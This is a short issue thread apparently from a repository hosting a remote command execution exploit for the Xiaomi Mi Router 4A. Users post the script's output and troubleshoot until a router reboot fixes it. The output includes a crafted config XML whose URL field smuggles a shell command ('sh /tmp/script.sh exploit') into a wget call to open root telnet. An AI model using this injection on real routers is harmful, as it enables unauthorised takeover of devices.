No work
Closed this issue · 4 comments
SergeyDjam commented
Hello
Mi Router 4A Giga Version | MiWiFi Release 2.28.132
- git clone
- python3 remote_command_execution_vulnerability.py
Router IP address: 192.168.31.1
stok: 123123123
****************
router_ip_address: 192.168.31.1
stok: 123123123
****************
start uploading config file...
start exec command...
done! Now you can connect to the router using telnet (user: root, password: none)
In MacOS, execute in the terminal:
telnet 192.168.31.1
- telnet 192.168.31.1
telnet: connect to address 192.168.31.1: Connection refused
debug:
http://192.168.31.1:8383/cgi-bin/luci/;stok=760b034592dddbc94939fa45868621eb/api
{"dev":[{"mac":"*************","maxdownloadspeed":"0","upload":"15032","upspeed":"0","downspeed":"0","online":"1529","devname":"nb","maxuploadspeed":"460","download":"0"}],"code":0,"mem":{"usage":0.35,"total":"128MB","hz":"1200MHz","type":"DDR3"},"temperature":0,"count":{"all":1,"online":1},"hardware":{"mac":"**************","platform":"R4A","version":"2.28.132","channel":"release","sn":"23319/20032427"},"upTime":"1562.49","cpu":{"core":4,"hz":"880MHz","load":0.0065},"wan":{"downspeed":"0","maxdownloadspeed":"0","history":"0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0","devname":"eth1","upload":"2932","upspeed":"0","maxuploadspeed":"0","download":"0"}}
python3 remote_command_execution_vulnerability.py
Router IP address: 192.168.31.1
stok: 760b034592dddbc94939fa45868621eb
<?xml version="1.0"?>
<root>
<class type="1">
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
<item url="http://dl.ijinshan.com/safe/speedtest/FDFD1EF75569104A8DB823E08D06C21C.dat"/>
</class>
<class type="2">
<item url="http://192.168.31.1 -q -O /dev/null;((sh /tmp/script.sh exploit) &);exit;wget http://192.168.31.1 "/>
</class>
<class type="3">
<item uploadurl="http://www.taobao.com/"/>
<item uploadurl="http://www.so.com/"/>
<item uploadurl="http://www.qq.com/"/>
<item uploadurl="http://www.sohu.com/"/>
<item uploadurl="http://www.tudou.com/"/>
<item uploadurl="http://www.360doc.com/"/>
<item uploadurl="http://www.kankan.com/"/>
<item uploadurl="http://www.speedtest.cn/"/>
</class>
</root>
****************
router_ip_address: 192.168.31.1
stok: 760b034592dddbc94939fa45868621eb
****************
start uploading config file...
{"code":401,"msg":"Invalid token"}
start exec command...
{"code":401,"msg":"Invalid token"}
done! Now you can connect to the router using telnet (user: root, password: none)
In MacOS, execute in the terminal:
telnet 192.168.31.1
SergeyDjam commented
fix it. On Internet
johol commented
I have the same problem. What have you done to fix it?
johol commented
Thanks, after rebooting the router everything is working.